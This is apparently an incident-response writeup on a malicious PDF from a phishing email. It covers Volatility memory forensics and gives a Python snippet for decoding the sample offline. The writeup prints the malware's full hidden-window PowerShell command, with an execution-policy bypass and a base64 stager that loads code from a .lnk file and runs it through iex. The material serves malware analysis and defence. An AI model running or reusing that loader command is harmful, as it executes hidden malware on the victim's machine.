We covered a cyber incident response case study that involved malicious PDF malware delivered through a phishing email. Once opened, the PDF spawned a PowerShell session in a hidden window that executed a base64-encoded command to retrieve another malicious file from a C2 server. We extracted the sample using Volatility plugins, then uploaded it to VirusTotal and Any.run to dynamically analyze the malware and extract the related artifacts.
Highlights
Memory Acquisition
Extracting a memory dump can be performed in numerous ways, varying based on the requirements of your investigation. Listed below are a few of the techniques and tools that can be used to extract memory from a bare-metal machine.
FTK Imager
Redline
DumpIt.exe
win32dd.exe / win64dd.exe
Memoryze
FastDump
dd
What is Volatility
Volatility is the world’s most widely used framework for extracting digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independently of the system being investigated, but offer visibility into the runtime state of the system.
Volatility 2 vs Volatility 3
Depending on the installed version of Volatility, the command syntax may differ. For example, in Volatility 2 we can directly use a plugin by its name, such as listing processes with the plugin pslist. In Volatility 3, however, we have to prefix the plugin with the operating system name, separated by a dot. Back to the process-listing example: in Volatility 3 we type windows.pslist to use the plugin.
Another difference is how the image info is determined. In Volatility 2 we use imageinfo to determine the operating system and then pass --profile osname in subsequent commands. In Volatility 3, however, we use either windows.info or linux.info to determine details about the OS, and we don’t need to specify the profile for the subsequent commands.
Commands executed in Volatility
Listing the processes
volatility -f case54.raw windows.pslist
Listing the files in the OS
volatility -f case54.raw windows.filescan
Extracting the PDF malware
volatility -f case54.raw windows.filescan | grep -i .pdf
Dumping the PDF to the local machine
volatility -f case54.raw -o /output/ windows.dumpfiles --physaddr <offset>
The PowerShell command executed by the PDF malware:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('JHN0UCwkc2lQPTMyMzAsOTY3NjskZj0ncmVzdW1lLnBkZi5sbmsnO2lmKC1ub3QoVGVzdC1QYXRoICRmKSl7JHg9R2V0LUNoaWxkSXRlbSAtUGF0aCAkZW52OnRlbXAgLUZpbHRlciAkZiAtUmVjdXJzZTtbSU8uRGlyZWN0b3J5XTo6U2V0Q3VycmVudERpcmVjdG9yeSgkeC5EaXJlY3RvcnlOYW1lKTt9JGxuaz1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJGYsJ09wZW4nLCdSZWFkJywnUmVhZFdyaXRlJzskYjY0PU5ldy1PYmplY3QgYnl0ZVtdKCRzaVApOyRsbmsuU2Vlaygkc3RQLFtJTy5TZWVrT3JpZ2luXTo6QmVnaW4pOyRsbmsuUmVhZCgkYjY0LDAsJHNpUCk7JGI2ND1bQ29udmVydF06OkZyb21CYXNlNjRDaGFyQXJyYXkoJGI2NCwwLCRiNjQuTGVuZ3RoKTskc2NCPVtUZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGI2NCk7aWV4ICRzY0I7')); iex $r;
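To see what that command does without running it, the base64 argument can be decoded offline and the decoded stager searched for the indicators an analyst records (the file it opens, the offset and size it reads, whether it ends in iex). The following Python is an added example, not part of the original writeup; the base64 is copied from the command above, and make_sample_lnk builds a constructed stand-in for the .lnk file, which is not on the page.

```python
import base64
import re

# Base64 argument of the FromBase64String('...') call in the PowerShell command line
# recovered from the memory image (copied from the page's writeup, wrapped for width).
STAGE1_B64 = (
    "JHN0UCwkc2lQPTMyMzAsOTY3NjskZj0ncmVzdW1lLnBkZi5sbmsnO2lmKC1ub3QoVGVzdC1QYXRo"
    "ICRmKSl7JHg9R2V0LUNoaWxkSXRlbSAtUGF0aCAkZW52OnRlbXAgLUZpbHRlciAkZiAtUmVjdXJz"
    "ZTtbSU8uRGlyZWN0b3J5XTo6U2V0Q3VycmVudERpcmVjdG9yeSgkeC5EaXJlY3RvcnlOYW1lKTt9"
    "JGxuaz1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJGYsJ09wZW4nLCdSZWFkJywnUmVhZFdyaXRl"
    "JzskYjY0PU5ldy1PYmplY3QgYnl0ZVtdKCRzaVApOyRsbmsuU2Vlaygkc3RQLFtJTy5TZWVrT3Jp"
    "Z2luXTo6QmVnaW4pOyRsbmsuUmVhZCgkYjY0LDAsJHNpUCk7JGI2ND1bQ29udmVydF06OkZyb21C"
    "YXNlNjRDaGFyQXJyYXkoJGI2NCwwLCRiNjQuTGVuZ3RoKTskc2NCPVtUZXh0LkVuY29kaW5nXTo6"
    "VW5pY29kZS5HZXRTdHJpbmcoJGI2NCk7aWV4ICRzY0I7"
)

def decode_stage(b64: str) -> str:
    """Do offline what [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(x)) does."""
    return base64.b64decode(b64).decode("ascii")

def triage(script: str) -> dict:
    """Pull the indicators an analyst wants from the decoded stager without running it."""
    nums = re.search(r"\$\w+,\$\w+=(\d+),(\d+)", script)   # e.g. "$stP,$siP=3230,9676"
    return {
        "offset": int(nums.group(1)) if nums else None,
        "size": int(nums.group(2)) if nums else None,
        "files": re.findall(r"'([^']+\.lnk)'", script),    # e.g. 'resume.pdf.lnk'
        "invokes_iex": re.search(r"\biex\b", script) is not None,
        "reads_temp": "$env:temp" in script,
    }

def carve_next_stage(lnk_bytes: bytes, offset: int, size: int) -> str:
    """Mirror the stager's read path on a copy of the .lnk: slice `size` bytes at
    `offset`, base64-decode, then UTF-16LE decode. Returns the next stage as text
    for review instead of handing it to iex."""
    chunk = lnk_bytes[offset:offset + size]
    return base64.b64decode(chunk).decode("utf-16-le")

def make_sample_lnk(stage_text: str, offset: int) -> bytes:
    """Constructed stand-in for the .lnk (the real file is not on the page): zero
    padding up to `offset`, then the base64 of the UTF-16LE stage, as the stager expects."""
    return b"\x00" * offset + base64.b64encode(stage_text.encode("utf-16-le"))

if __name__ == "__main__":
    stager = decode_stage(STAGE1_B64)
    print(triage(stager))
    sample = make_sample_lnk("Write-Host 'constructed next stage'", 3230)
    print(carve_next_stage(sample, 3230, len(sample) - 3230))
```

The decoded stager opens resume.pdf.lnk (searching %TEMP% if needed), reads 9676 bytes at offset 3230, base64- and UTF-16LE-decodes them and passes the result to iex, so the .lnk dropped alongside the PDF is the artifact to collect next.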
Video Walkthrough | Full Analysis with Any.Run